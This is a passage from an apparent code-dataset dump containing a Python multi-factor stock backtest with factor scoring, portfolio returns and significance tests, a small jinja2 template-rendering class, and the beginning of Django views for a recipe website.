stats.mstats.winsorize(Data_for_Portfolio_master_filter['FCF/P'], \\\n limits=Winsorize_Threshold)\n \n #create Z score to normalize the metrics\n Data_for_Portfolio_master_filter['E/P Z score'] = \\\n stats.zscore(Data_for_Portfolio_master_filter['E/P Winsorized'])\n Data_for_Portfolio_master_filter['EBITDA/EV Z score'] = \\\n stats.zscore(Data_for_Portfolio_master_filter['EBITDA/EV Winsorized'])\n Data_for_Portfolio_master_filter['FCF/P Z score'] = \\\n stats.zscore(Data_for_Portfolio_master_filter['FCF/P Winsorized'])\n \n Data_for_Portfolio_master_filter['Valuation Score'] = \\\n Data_for_Portfolio_master_filter['E/P Z score'] \\\n + Data_for_Portfolio_master_filter['EBITDA/EV Z score']\\\n + Data_for_Portfolio_master_filter['FCF/P Z score']\n \n ###### QUALITY FACTOR ###### \n \n Data_for_Portfolio_master_filter['FCF/Assets Winsorized'] = \\\n stats.mstats.winsorize(Data_for_Portfolio_master_filter['FCF/Assets'], \\\n limits=Winsorize_Threshold)\n Data_for_Portfolio_master_filter['ROA Winsorized'] = \\\n stats.mstats.winsorize(Data_for_Portfolio_master_filter['ROA'], \\\n limits=Winsorize_Threshold)\n 
Data_for_Portfolio_master_filter['ROIC Winsorized'] = \\\n stats.mstats.winsorize(Data_for_Portfolio_master_filter['ROIC'], \\\n limits=Winsorize_Threshold)\n Data_for_Portfolio_master_filter['Gross Margin Winsorized'] = \\\n stats.mstats.winsorize(Data_for_Portfolio_master_filter['GROSS MARGIN'], \\\n limits=Winsorize_Threshold)\n Data_for_Portfolio_master_filter['Current Ratio Winsorized'] = \\\n stats.mstats.winsorize(Data_for_Portfolio_master_filter['CURRENT RATIO'], \\\n limits=Winsorize_Threshold)\n Data_for_Portfolio_master_filter['Interest/EBITDA Winsorized'] = \\\n stats.mstats.winsorize(Data_for_Portfolio_master_filter['INTEREST/EBITDA'], \\\n limits=Winsorize_Threshold)\n \n #create Z score\n \n Data_for_Portfolio_master_filter['FCF/Assets Z score'] = \\\n stats.zscore(Data_for_Portfolio_master_filter['FCF/Assets Winsorized'])\n Data_for_Portfolio_master_filter['ROA Z score'] = \\\n stats.zscore(Data_for_Portfolio_master_filter['ROA Winsorized'])\n Data_for_Portfolio_master_filter['ROIC Z score'] = \\\n stats.zscore(Data_for_Portfolio_master_filter['ROIC Winsorized'])\n Data_for_Portfolio_master_filter['Gross Margin Z score'] = \\\n stats.zscore(Data_for_Portfolio_master_filter['Gross Margin Winsorized'])\n Data_for_Portfolio_master_filter['Current Ratio Z score'] = \\\n stats.zscore(Data_for_Portfolio_master_filter['Current Ratio Winsorized'])\n Data_for_Portfolio_master_filter['Interest/EBITDA Z score'] = \\\n stats.zscore(Data_for_Portfolio_master_filter['Interest/EBITDA Winsorized'])\n \n Data_for_Portfolio_master_filter['Quality Score'] = \\\n Data_for_Portfolio_master_filter['FCF/Assets Z score'] \\\n + Data_for_Portfolio_master_filter['ROA Z score'] \\\n + Data_for_Portfolio_master_filter['ROIC Z score']\\\n + Data_for_Portfolio_master_filter['Gross Margin Z score']\\\n + Data_for_Portfolio_master_filter['Current Ratio Z score']\\\n - Data_for_Portfolio_master_filter['Interest/EBITDA Z score']\n\n ###### SHAREHOLDER YIELD FACTOR #####\n \n Data_for_Portfolio_master_filter['Shareholder Yield Winsorized'] = \\\n stats.mstats.winsorize(Data_for_Portfolio_master_filter['Shareholder Yield'], \\\n limits=Winsorize_Threshold)\n Data_for_Portfolio_master_filter['Shareholder Yield Z score'] = \\\n stats.zscore(Data_for_Portfolio_master_filter['Shareholder Yield Winsorized'])\n Data_for_Portfolio_master_filter['Shareholder Yield Score'] = \\\n Data_for_Portfolio_master_filter['Shareholder Yield Z score'] \n\n ###### LOW VOLATILITY FACTOR ######\n \n #must have fundamental data from previous factors for price based factors\n #as some equities have price data and no fundamental data which should not\n #be included\n Sector_stocks_Fundamental_tickers = Data_for_Portfolio_master_filter['ticker'].tolist()\n \n Sector_stock_prices_vol_df = Sector_stock_prices.loc\\\n [Sector_stock_prices['ticker'].isin(Sector_stocks_Fundamental_tickers)]\n \n Sector_stock_prices_vol_df_1 = Sector_stock_prices_vol_df.iloc[:, [0, 1, 5]]\n \n Sector_stock_prices_vol_df_1_wide = Sector_stock_prices_vol_df_1.pivot\\\n (index='date', columns='ticker', values='close')\n \n Sector_stock_prices_vol_df_1_wide = Sector_stock_prices_vol_df_1_wide.fillna(0)\n Sector_stock_returns = Sector_stock_prices_vol_df_1_wide.pct_change() \n \n #create rolling vol metric for previous 2 years\n Sector_stock_rolling_vol = Sector_stock_returns.rolling(252*2).std()\n \n #Choose second to last trading day to look at previous vol \n #Sometimes the dates are off when trying to line up end of quarter and business\n #days so to 
eliminate errors in the for loop I go to day of quarter, shift forward\n #a business day and then go back two business days\n Date_to_execute_trade = pd.to_datetime(Date) + pd.tseries.offsets.QuarterEnd()\n Date_to_execute_trade_plus1 = Date_to_execute_trade + pd.tseries.offsets.BusinessDay(1)\n final_trade_date = Date_to_execute_trade_plus1 - pd.tseries.offsets.BusinessDay(2)\n \n #pick the final trade date volatility for each ticker\n Filter_Date_Vol = final_trade_date.strftime('%Y-%m-%d')\n Filter_Vol_Signal = Sector_stock_rolling_vol.loc[Filter_Date_Vol]\n Filter_Vol_Signal_Sort = Filter_Vol_Signal.sort_values().dropna()\n \n #create z score and rank for the Volatility Factor\n frame = { 'Vol': Filter_Vol_Signal_Sort} \n Filter_Vol_Signal_df = pd.DataFrame(frame)\n Filter_Vol_Signal_df['Vol Z Score'] = stats.zscore(Filter_Vol_Signal_Sort)\n Filter_Vol_Signal_df = Filter_Vol_Signal_df.reset_index()\n \n Data_for_Portfolio_master_filter = Data_for_Portfolio_master_filter.merge(Filter_Vol_Signal_df, how = 'inner', on = ['ticker']) \n\n ###### TREND FACTOR #####\n \n tickers_trend = list(Sector_stock_prices_vol_df_1_wide.columns)\n \n #This is a very simply way to see how much a stock is in a trend up or down\n #You could easily make this more complex/robust but it would cost you in \n #execution time\n df_sma_50 = Sector_stock_prices_vol_df_1_wide.rolling(50).mean()\n df_sma_100 = Sector_stock_prices_vol_df_1_wide.rolling(100).mean()\n df_sma_150 = Sector_stock_prices_vol_df_1_wide.rolling(150).mean()\n df_sma_200 = Sector_stock_prices_vol_df_1_wide.rolling(200).mean()\n \n #Get the same date for vol measurement near rebalance date\n Filter_Date_Trend = final_trade_date.strftime('%Y-%m-%d')\n Filter_Trend_Signal_50 = df_sma_50.loc[Filter_Date_Trend]\n Filter_Trend_Signal_100 = df_sma_100.loc[Filter_Date_Trend]\n Filter_Trend_Signal_150 = df_sma_150.loc[Filter_Date_Trend]\n Filter_Trend_Signal_200 = df_sma_200.loc[Filter_Date_Trend]\n \n Price_Signal = Sector_stock_prices_vol_df_1_wide.loc[Filter_Date_Trend]\n \n Filter_SMA_Signal_df = pd.DataFrame(tickers_trend)\n Filter_SMA_Signal_df = Filter_SMA_Signal_df.rename(columns={0: \"ticker\"})\n Filter_SMA_Signal_df['SMA 50 position'] = np.where(Price_Signal > Filter_Trend_Signal_50,1,0)\n Filter_SMA_Signal_df['SMA 100 position'] = np.where(Price_Signal > Filter_Trend_Signal_100,1,0)\n Filter_SMA_Signal_df['SMA 150 position'] = np.where(Price_Signal > Filter_Trend_Signal_150,1,0)\n Filter_SMA_Signal_df['SMA 200 position'] = np.where(Price_Signal > Filter_Trend_Signal_200,1,0)\n Filter_SMA_Signal_df['Trend Score'] = np.mean(Filter_SMA_Signal_df, axis=1)\n Data_for_Portfolio_master_filter = Data_for_Portfolio_master_filter.merge(Filter_SMA_Signal_df[['ticker','Trend Score']], how = 'inner', on = ['ticker'])\n \n ###### MOMENTUM FACTOR #####\n \n tickers_momentum = list(Sector_stock_prices_vol_df_1_wide.columns)\n #from the academic literature of 12 months - 1 month momentum \n df_mom_11_months = Sector_stock_prices_vol_df_1_wide.pct_change(22*11)\n \n Filter_Date_Mom = Date_to_execute_trade_plus1 - pd.tseries.offsets.BusinessDay(24)\n Filter_Date_Mom_trim = final_trade_date.strftime('%Y-%m-%d')\n Filter_Mom_Signal = df_mom_11_months.loc[Filter_Date_Mom_trim]\n \n Filter_MOM_df = pd.DataFrame(tickers_momentum)\n Filter_MOM_df = Filter_MOM_df.rename(columns={0: \"ticker\"})\n Filter_MOM_df['Percent Change'] = Filter_Mom_Signal.values\n \n Filter_MOM_df = Filter_MOM_df.replace([np.inf, -np.inf], np.nan)\n Filter_MOM_df = Filter_MOM_df.dropna()\n 
Filter_MOM_df['Momentum Score'] = stats.zscore(Filter_MOM_df['Percent Change'])\n \n Data_for_Portfolio_master_filter = Data_for_Portfolio_master_filter.merge(Filter_MOM_df[['ticker','Momentum Score']], how = 'inner', on = ['ticker'])\n \n ### Create Composite Score from factors ###\n \n #Because we made all the factors with a z score each factor should have equal\n #weight in the composite. You could consider changing the weights based on \n #historical statistical significance or whatever else seems reasonable\n \n #This particular scoring system only invests in companies with \n #positive trend/momentum after ranking by the other factors\n Data_for_Portfolio_master_filter['Total Score'] = \\\n Data_for_Portfolio_master_filter['Valuation Score'] + \\\n Data_for_Portfolio_master_filter['Quality Score'] + \\\n Data_for_Portfolio_master_filter['Shareholder Yield Score'] - \\\n Data_for_Portfolio_master_filter['Vol Z Score'] * \\\n (Data_for_Portfolio_master_filter['Momentum Score'] + \\\n Data_for_Portfolio_master_filter['Trend Score'])\n \n number_firms = Data_for_Portfolio_master_filter.shape\n number_firms = number_firms[0]\n \n firms_in_percentile = np.round(Percentile_split * number_firms)\n \n Data_for_Portfolio_master_filter = \\\n Data_for_Portfolio_master_filter.sort_values('Total Score', ascending=False)\n \n ##### How to Filter Companies ####\n \n # Filter so pick the best and worst company from each sector # \n filtered_df = Data_for_Portfolio_master_filter.copy()\n filtered_df2 = Data_for_Portfolio_master_filter.copy()\n\n Sector_stocks_cheapest = \\\n filtered_df.drop_duplicates(['sector'], keep='first').groupby('ticker').head()\n Sector_stocks_expensive = \\\n filtered_df2.drop_duplicates(['sector'], keep='last').groupby('ticker').head()\n \n ###### OR ####### \n \n #filter the dataset by the desired number of companies for expensive and cheap\n # Sector_stocks_cheapest = Data_for_Portfolio_master_filter.iloc[:int(Companies_in_Portfolio)]\n # Sector_stocks_expensive = Data_for_Portfolio_master_filter.iloc[int(-Companies_in_Portfolio):]\n \n ###### OR #######\n \n #filter the dataset by the percentile for expensive and cheap\n #Sector_stocks_cheapest = Data_for_Portfolio_master_filter.iloc[:int(firms_in_percentile)]\n #### If you want to create top half portfolio and bottom half ###\n #left_over_firms = number_firms - firms_in_percentile\n #Sector_stocks_expensive = Data_for_Portfolio_master_filter.iloc[int(-left_over_firms):]\n #Sector_stocks_expensive = Data_for_Portfolio_master_filter.iloc[int(-firms_in_percentile):]\n \n #convert the list of unique tickers to a list\n Sector_stocks_cheapest_tickers = Sector_stocks_cheapest['ticker'].tolist()\n Sector_stocks_expensive_tickers = Sector_stocks_expensive['ticker'].tolist()\n \n #keep track of stocks, Tranche, and turnover\n Turnover = pd.DataFrame({'Date':Date,\n 'Tickers':Sector_stocks_cheapest_tickers,\n 'Sector':Sector_stocks_cheapest['sector'].tolist(),\n 'Weight':1/len(Sector_stocks_cheapest_tickers)})\n Portfolio_Turnover = Portfolio_Turnover.append(Turnover)\n \n #filter the price date by the list of tickers\n Sector_stock_prices_cheapest = Sector_stock_prices.loc\\\n [Sector_stock_prices['ticker'].isin(Sector_stocks_cheapest_tickers)]\n Sector_stock_prices_expensive = Sector_stock_prices.loc\\\n [Sector_stock_prices['ticker'].isin(Sector_stocks_expensive_tickers)]\n \n #get date, ticker, and close(adjusted) columns\n Sector_stock_prices_cheapest = Sector_stock_prices_cheapest.iloc[:, [0, 1, 5]]\n 
Sector_stock_prices_expensive = Sector_stock_prices_expensive.iloc[:, [0, 1, 5]]\n \n #add a quarter to reporting so no lookahead bias\n Date_to_execute_trade = pd.to_datetime(Date) + pd.tseries.offsets.QuarterEnd()\n Date_to_execute_trade_plus1 = Date_to_execute_trade + pd.tseries.offsets.BusinessDay(1)\n final_trade_date = Date_to_execute_trade_plus1 - pd.tseries.offsets.BusinessDay(1)\n \n #add 4 quarters to end so the rebalance will be annual\n end_date = Date_to_execute_trade + pd.tseries.offsets.QuarterEnd(4)\n final_trade_date_trim = final_trade_date.strftime('%Y-%m-%d')\n end_date_trim = end_date.strftime('%Y-%m-%d')\n start_date = final_trade_date_trim\n end_date = end_date_trim\n \n #make data from long format to wide and fill in Na's with O\n Sector_stock_prices_cheapest_wide = Sector_stock_prices_cheapest.pivot\\\n (index='date', columns='ticker', values='close')\n Sector_stock_prices_cheapest_wide = \\\n Sector_stock_prices_cheapest_wide.fillna(0)\n Sector_stock_prices_expensive_wide = \\\n Sector_stock_prices_expensive.pivot(index='date', columns='ticker', values='close')\n Sector_stock_prices_expensive_wide = \\\n Sector_stock_prices_expensive_wide.fillna(0)\n \n #This is how to handle if there are no firms in the cheap or empty dataframe.\n #As it stands now, this won't happen, but when in early development\n #There were times when no companies meant the fundamental filter\n if Sector_stock_prices_cheapest_wide.empty == True:\n days = price_index\n number_days = len(price_index)\n filler_returns = np.repeat(0, number_days)\n df = pd.DataFrame({'Days': days, 'Returns': filler_returns})\n df = df.set_index('Days')\n Sector_stock_prices_cheapest_wide = df\n else:\n pass\n \n if Sector_stock_prices_expensive_wide.empty == True:\n days = price_index\n number_days = len(price_index)\n filler_returns = np.repeat(0, number_days)\n df = pd.DataFrame({'Days': days, 'Returns': filler_returns})\n df = df.set_index('Days')\n Sector_stock_prices_expensive_wide = df\n else:\n pass\n \n ########### High Factor Price Returns and Portfolio #########\n \n #pick out start date and end date for calculating equity returns\n Sector_stock_prices_cheapest_wide.loc[start_date:end_date].head()\n Sector_stock_prices_cheapest_wide = \\\n Sector_stock_prices_cheapest_wide.loc[start_date:end_date]\n Cheap_returns_daily = Sector_stock_prices_cheapest_wide.pct_change()\n \n #if there are no assets then the Cheap_returns_daily become NaN and in that\n #case we will need to by pass the normal operations and just keep the dataframe\n x = np.logical_and\\\n (Cheap_returns_daily.shape[1] == 1, Cheap_returns_daily.isnull().all() == True)\n \n if x[0] == True:\n Cheap_returns_daily = Sector_stock_prices_cheapest_wide\n else:\n #get rid of first NaN row\n Cheap_returns_daily = Cheap_returns_daily.dropna(how='all')\n \n #get rid of stocks that have no trading\n Cheap_returns_daily = Cheap_returns_daily.dropna(axis='columns')\n \n column_length = Cheap_returns_daily.shape[1] #if no column\n \n ###### Portfolio Securities Weighting / Optimization #####\n \n #This is where you could add your own portfolio optimization\n \n ##### Equal Weight ####\n \n #equal weight based on number of stocks\n portfolio_weights = np.repeat(1/column_length, column_length)\n \n ### OR ###\n \n #### Market Cap Weight ####\n # Cheap_returns_tickers = Cheap_returns_daily.columns.tolist()\n # Cheap_returns_tickers_fundamentals = Sector_stocks_cheapest.loc[Sector_stocks_cheapest['ticker'].isin(Cheap_returns_tickers)]\n # 
Cheap_returns_tickers_fundamentals['weights']= Cheap_returns_tickers_fundamentals['marketcap'] / Cheap_returns_tickers_fundamentals['marketcap'].sum()\n    # portfolio_weights = np.array(Cheap_returns_tickers_fundamentals['weights'])\n    \n    ### OR ###\n    \n    ### Score Confidence Weight ###\n    # Cheap_returns_tickers = Cheap_returns_daily.columns.tolist()\n    # Cheap_returns_tickers_fundamentals = Sector_stocks_cheapest.loc[Sector_stocks_cheapest['ticker'].isin(Cheap_returns_tickers)]\n    # Cheap_returns_tickers_fundamentals['weights']= Cheap_returns_tickers_fundamentals['Total Score'] / Cheap_returns_tickers_fundamentals['Total Score'].sum()\n    # portfolio_weights = np.array(Cheap_returns_tickers_fundamentals['weights'])\n    \n    #use dot product to calculate portfolio returns\n    Cheap_returns_daily['portfolio return'] = Cheap_returns_daily.dot(portfolio_weights)\n    Portfolio_returns_Cheap = Cheap_returns_daily['portfolio return']\n    Portfolio_returns_Cheap = pd.DataFrame(Portfolio_returns_Cheap)\n    \n    ####### Expensive Stock Price Returns and Portfolio ########\n    \n    Sector_stock_prices_expensive_wide = \\\n        Sector_stock_prices_expensive_wide.loc[start_date:end_date]\n    Expensive_returns_daily = Sector_stock_prices_expensive_wide.pct_change()\n    \n    #if there are no assets then Expensive_returns_daily becomes NaN and in that\n    #case we will need to bypass the normal operations and just keep the dataframe\n    x = np.logical_and(Expensive_returns_daily.shape[1] == 1, \\\n                       Expensive_returns_daily.isnull().all() == True)\n    \n    if x[0] == True:\n        Expensive_returns_daily = Sector_stock_prices_expensive_wide\n    else:\n        #get rid of first NaN row\n        Expensive_returns_daily = Expensive_returns_daily.dropna(how='all')\n    \n    #get rid of stocks that have no trading\n    Expensive_returns_daily = Expensive_returns_daily.dropna(axis='columns')\n    \n    column_length = Expensive_returns_daily.shape[1]\n    #here you could replace with different optimization techniques\n    \n    #equal weight based on number of stocks\n    portfolio_weights = np.repeat(1/column_length, column_length)\n    \n    ### OR ###\n    \n    #### Market Cap Weight ####\n    # Expensive_returns_tickers = Expensive_returns_daily.columns.tolist()\n    # Expensive_returns_tickers_fundamentals = Sector_stocks_expensive.loc[Sector_stocks_expensive['ticker'].isin(Expensive_returns_tickers)]\n    # Expensive_returns_tickers_fundamentals['weights']= Expensive_returns_tickers_fundamentals['marketcap'] / Expensive_returns_tickers_fundamentals['marketcap'].sum()\n    # portfolio_weights = np.array(Expensive_returns_tickers_fundamentals['weights'])\n    \n    ### OR ###\n    \n    ### Score Confidence Weight ###\n    # Expensive_returns_tickers = Expensive_returns_daily.columns.tolist()\n    # Expensive_returns_tickers_fundamentals = Sector_stocks_expensive.loc[Sector_stocks_expensive['ticker'].isin(Expensive_returns_tickers)]\n    # Expensive_returns_tickers_fundamentals['weights']= -Expensive_returns_tickers_fundamentals['Total Score'] / Expensive_returns_tickers_fundamentals['Total Score'].sum()\n    # portfolio_weights = np.array(Expensive_returns_tickers_fundamentals['weights'])\n    \n    #use dot product to calculate portfolio returns\n    Expensive_returns_daily['portfolio return'] = Expensive_returns_daily.dot(portfolio_weights)\n    Portfolio_returns_Expensive = Expensive_returns_daily['portfolio return']\n    Portfolio_returns_Expensive = pd.DataFrame(Portfolio_returns_Expensive)\n    \n    merged = pd.merge(Portfolio_returns_Cheap, Portfolio_returns_Expensive, \\\n                      how='inner', left_index=True, right_index=True)\n    merged['L/S'] = merged.iloc[:, 0]-merged.iloc[:, 1]\n
    portfolio_returns = portfolio_returns.append(merged)\n\nportfolio_returns.columns = ['High Factor', 'Low Factor', 'LS']\n\n############### Create the Equal Weight Portfolio Benchmark ###############\n#Equal Weight Portfolio as Benchmark\n\nf_date = datetime.date(2012, 9, 30)\nl_date = datetime.date(2020, 9, 30)\ndelta = l_date - f_date\nquarters_delta = np.floor(delta.days/(365/4))\nquarters_delta = int(quarters_delta)\nfirst_quarter = str('2012-09-30')\nequal_weight_returns = pd.DataFrame()\nData_for_Portfolio_master = pd.DataFrame(Data_for_Portfolio)\n\nfor i in range(0, quarters_delta, 1):\n\n    Date = pd.to_datetime(first_quarter) + pd.tseries.offsets.QuarterEnd(i)\n    Date = Date.strftime('%Y-%m-%d')\n    Data_for_Portfolio_master_filter = \\\n        Data_for_Portfolio_master.loc[Data_for_Portfolio_master\\\n                                      ['calendardate'] == Date]\n    Sector_stocks = pd.DataFrame(Data_for_Portfolio_master_filter)\n    Sector_stocks_tickers = Sector_stocks['ticker'].tolist()\n\n    Sector_stock_prices_trim = Sector_stock_prices.loc\\\n        [Sector_stock_prices['ticker'].isin(Sector_stocks_tickers)]\n\n    #get date, ticker, and close(adjusted) columns\n    Sector_stock_prices_trim = Sector_stock_prices_trim.iloc[:, [0, 1, 5]]\n\n    #add a quarter to reporting so no lookahead bias\n    Date_to_execute_trade = pd.to_datetime(Date) + pd.tseries.offsets.QuarterEnd()\n    Date_to_execute_trade_plus1 = Date_to_execute_trade + pd.tseries.offsets.BusinessDay(1)\n    final_trade_date = Date_to_execute_trade_plus1 - pd.tseries.offsets.BusinessDay(1)\n\n    #add 1 quarter to end so the benchmark rebalances quarterly\n    end_date = Date_to_execute_trade + pd.tseries.offsets.QuarterEnd()\n    final_trade_date_trim = final_trade_date.strftime('%Y-%m-%d')\n    end_date_trim = end_date.strftime('%Y-%m-%d')\n    start_date = final_trade_date_trim\n    end_date = end_date_trim\n\n    #make data from long format to wide\n    Sector_stock_prices_wide = Sector_stock_prices_trim.pivot\\\n        (index='date', columns='ticker', values='close')\n    Sector_stock_prices_wide = Sector_stock_prices_wide.fillna(0)\n\n    #pick out start date and end date for calculating equity returns\n    Sector_stock_prices_wide = Sector_stock_prices_wide.loc[start_date:end_date]\n\n    returns_daily = Sector_stock_prices_wide.pct_change()\n    #get rid of first NaN row\n    returns_daily = returns_daily.dropna(how='all')\n    #get rid of columns with no data\n    returns_daily = returns_daily.dropna(axis='columns')\n    column_length = np.where(returns_daily.shape[1] == 0, 1, returns_daily.shape[1])\n\n    portfolio_weights = np.repeat(1/column_length, column_length)\n    returns_daily['portfolio return'] = returns_daily.dot(portfolio_weights)\n    EW_returns = returns_daily['portfolio return']\n    EW_returns_df = pd.DataFrame(EW_returns)\n    equal_weight_returns = equal_weight_returns.append(EW_returns_df)\n\n#replace inf values (from the first entry) with 0\nequal_weight_returns = equal_weight_returns.replace([np.inf, -np.inf], 0)\n\nCombined_Portfolio_returns = pd.merge(equal_weight_returns, \\\n                                      portfolio_returns, how='inner', \\\n                                      left_index=True, right_index=True)\n\n#replace inf values (from the first entry) with 0\nCombined_Portfolio_returns = Combined_Portfolio_returns.replace\\\n    ([np.inf, -np.inf], 0)\n\n#Rename the columns\nCombined_Portfolio_returns = Combined_Portfolio_returns.rename\\\n    (columns={\"portfolio return\": \"Equal Weight\"})\n\nCombined_Portfolio_returns.index = pd.to_datetime(Combined_Portfolio_returns.index)\n\n#create a performance chart and save for later\nportfolio_index = (1 + Combined_Portfolio_returns).cumprod()\n
ax = portfolio_index.plot(title='Multi-Factor Out of Sample performance')\nfig = ax.get_figure()\nCrystal_Ball_Performance_Chart = 'Multi-Factor Out of Sample Performance Chart Annual Rebal'\npath_to_file = (\n    r'file here'\n    )\noutput_name = path_to_file + Crystal_Ball_Performance_Chart + '.pdf'\nfig.savefig(output_name)\n\nt1 = time.time()\ntotal = t1 - t0\nprint(\"It took \" + str(np.round(total/60,2)) + \" minutes to run the code\")\n#%%\n####################get risk free rate from Kenneth French#####################\nlen(get_available_datasets())\n\nds = web.DataReader('F-F_Research_Data_Factors_daily', 'famafrench', start='1990-08-30')\n\nprint(ds['DESCR'])\n\nds[0].head()\n#%%\ndata = ds[0]\ndata = data.dropna()\ndata = data/100 #convert to percent returns\nRF_data = (1+data['RF']).cumprod()\n\nRF_start_date = portfolio_index.first_valid_index()\nRF_end_date = portfolio_index.last_valid_index()\n\nRF_data = pd.DataFrame(RF_data[RF_start_date:RF_end_date])\n#################Calculate Risk and Performance############################\nannualized_return(RF_data)\nRF_Ann_Return_df = annualized_return(RF_data)\nRF_Ann_Return = np.round(float(RF_Ann_Return_df.iloc[:, 1]), 4)\n\nsum(portfolio_returns['LS'])/(portfolio_returns.shape[0]/252)\n\nreturns = annualized_return(portfolio_index)\nStddev = annualized_standard_deviation(portfolio_index)\nSector_Perf = returns.merge(Stddev)\n\nSharpe_Ratios = sharpe_ratio(portfolio_index, RF_Ann_Return)\nSector_Perf = Sector_Perf.merge(Sharpe_Ratios)\n\nSortino_Ratios = sortino_ratio(portfolio_index, RF_Ann_Return)\nSector_Perf = Sector_Perf.merge(Sortino_Ratios)\n\nMax_DD = max_drawdown(portfolio_index)\n\nSector_Perf = Sector_Perf.merge(Max_DD)\n\nCalmar_Ratios = calmar_ratio(portfolio_index)\nSector_Perf = Sector_Perf.merge(Calmar_Ratios)\n\nGain_To_Pain = gain_to_pain_ratio(portfolio_index)\nSector_Perf = Sector_Perf.merge(Gain_To_Pain)\nprint(Sector_Perf)\nSector_Perf = Sector_Perf.set_index('Portfolio')\n#%%\n#Save the performance for later use\nOut_of_Sample_Performance = 'Out of Sample Performance '\n\npath_to_file = (\n    r'file_here'\n    )\noutput_name = path_to_file + Out_of_Sample_Performance + '.csv'\nSector_Perf.to_csv(output_name)\n\nos.system('say \"your program has finished\"')\n#%%\n#### testing statistical significance of alpha ####\n\n#Sample Size\nN = Combined_Portfolio_returns.shape[0]\n\n#Calculate the variance to get the standard deviation\nPortfolio_Alpha = Combined_Portfolio_returns['High Factor'] - Combined_Portfolio_returns['Equal Weight']\n#For unbiased max likelihood estimate we have to divide the var by N-1,\n# and therefore the parameter ddof = 1\nvar_alpha = Portfolio_Alpha.var(ddof=1)\n\n## Calculate the t-statistics\nt = (Portfolio_Alpha.mean() - 0) / np.sqrt(var_alpha/N)\n\n## Compare with the critical t-value\n#Degrees of freedom\ndf = N-1\n\n#p-value after comparison with the t\np = 1 - stats.t.cdf(t, df=df)\n\nprint(\"t = \" + str(t))\nprint(\"p = \" + str(p))\n\ncheap_array = np.array(Combined_Portfolio_returns['High Factor'].dropna())\n\nequal_weight_array = np.array(Combined_Portfolio_returns['Equal Weight'])\nnp.isnan(cheap_array).any()\nnp.isnan(equal_weight_array).any()\n## Cross Checking with the internal scipy function\nt2, p2 = stats.ttest_ind(cheap_array, equal_weight_array)\nprint(\"t = \" + str(t2))\nprint(\"p = \" + str(p2/2)) #one sided t test\n#%%\n#####Testing Statistical Significance of L/S Portfolio#########\n\n#Sample Size\nN = Combined_Portfolio_returns.shape[0]\n\n#Calculate the variance to get the standard deviation\n#For unbiased max
likelihood estimate we have to divide the var by N-1,\n#and therefore the parameter ddof = 1\nvar_factor = Combined_Portfolio_returns['LS'].var(ddof=1)\n\n## Calculate the t-statistics\nt = (Combined_Portfolio_returns['LS'].mean() - 0) / np.sqrt(var_factor/N)\n\n## Compare with the critical t-value\n#Degrees of freedom\ndf = N-1\n\n#p-value after comparison with the t\np = 1 - stats.t.cdf(t, df=df)\n\nprint(\"t = \" + str(t))\nprint(\"p = \" + str(p))\n### You can see that after comparing the\n\nZEROS = [0] * N\n## Cross Checking with the internal scipy function\nt2, p2 = stats.ttest_ind(Combined_Portfolio_returns['LS'], ZEROS)\nprint(\"t = \" + str(t2))\nprint(\"p = \" + str(p2/2)) #one sided t test\n#%%\n\n","sub_path":"Multi-Factor/portfolio_multi_factor_models_rebalance_annually_public_medium_OOS.py","file_name":"portfolio_multi_factor_models_rebalance_annually_public_medium_OOS.py","file_ext":"py","file_size_in_byte":36232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"262383143","text":"import random, jinja2\n\nclass RenderEngine:\n    def __init__(self):\n        self.environment = jinja2.Environment()\n        self.environment.globals['random'] = random\n\n    def warp(self, string):\n        if string.isdigit():\n            return int(string)\n        try:\n            return float(string)\n        except ValueError:\n            return string\n\n    def render(self, obj, **kwargs):\n        if isinstance(obj, str):\n            return self.render_string(obj, ** kwargs)\n\n        elif isinstance(obj, (list, tuple)):\n            for i, item in enumerate(obj):\n                obj[i] = self.render(obj[i], ** kwargs)\n            return obj\n\n        elif isinstance(obj, dict):\n            for key, value in obj.items():\n                obj[key] = self.render(value, ** kwargs)\n            return obj\n        else:\n            return obj\n\n    def render_string(self, string, **kwargs):\n        if string.startswith('@'):\n            string = string.replace('@', '{{')\n            string += '}}'\n\n        template = self.environment.from_string(string)\n        try:\n            return self.warp(template.render(** kwargs)) \n        except:\n            return string","sub_path":"tools/render_engine.py","file_name":"render_engine.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"185173718","text":"from django.shortcuts import render, get_object_or_404, redirect, HttpResponseRedirect\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import UserForm\nfrom itertools import chain\nfrom .models import *\nfrom .methods import *\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.template import loader\n\n\n\ndef homepage(request):\n    recipes = Recipe.objects.filter(rating__gte=70).order_by('-rating')\n    recipes = recipes[:4]\n    images = []\n    for recipe in recipes:\n        img = recipe.images.all()\n        if img:\n            images.append(img[0])\n        else:\n            images.append(Images())\n\n    return render(request, 'RecipeApp/index.html', {'Recipes':recipes, 'Images':images})\n\ndef categories(request):\n    return render(request, 'RecipeApp/categories.html', {})\n\n@login_required\ndef mypage(request):\n    user = request.user\n    cook = Cook.objects.filter(user=user)[0]\n    recipes = cook.saved_recipe.all()\n    images = []\n    for recipe in recipes:\n        img = recipe.images.all()\n        if img:\n            images.append(img[0])\n        else:\n            images.append(Images())\n    return render(request, 'RecipeApp/mypage.html', {'Recipes':recipes, 'Images':images, 'Cook':cook})\n\n\n#In the methods.py file there are some methods which return the json information right now\n#these methods still have to be converted 
to\ndef single(request):\n    #response = searchRecipes(\"nuts\", 3, \"Italian\", \"main course\", \"milk\")\n    ID = 736910\n    recipe = recipeInfo(ID)\n    similar_recipe = similarRecipes(ID)\n    similar_images = []\n    images = []\n    ingredients = []\n    for recept in similar_recipe:\n        img = recept.images.all()\n        if img:\n            similar_images.append(img[0])\n        else:\n            similar_images.append(Images())\n\n    img = recipe.images.all()\n    if img:\n        images.append(img[0])\n    else:\n        images.append(Images())\n    ingredients.append(list(recipe.ingredients.all()))\n\n    return render(request, 'RecipeApp/single.html', {'Recipes':recipe, 'Images':images[0], \"Ingredients\":ingredients, 'similar_recipe': similar_recipe, 'similar_images': similar_images})\n\ndef random(request):\n    #response = searchRecipes(\"nuts\", 3, \"Italian\", \"main course\", \"milk\")\n    recipe = randomRecipe()\n    images = []\n    ingredients = []\n    img = recipe.images.all()\n    if img:\n        images.append(img[0])\n    else:\n        images.append(Images())\n\n    ingredients.append(list(recipe.ingredients.all()))\n    return render(request, 'RecipeApp/single.html', {'Recipes':recipe, 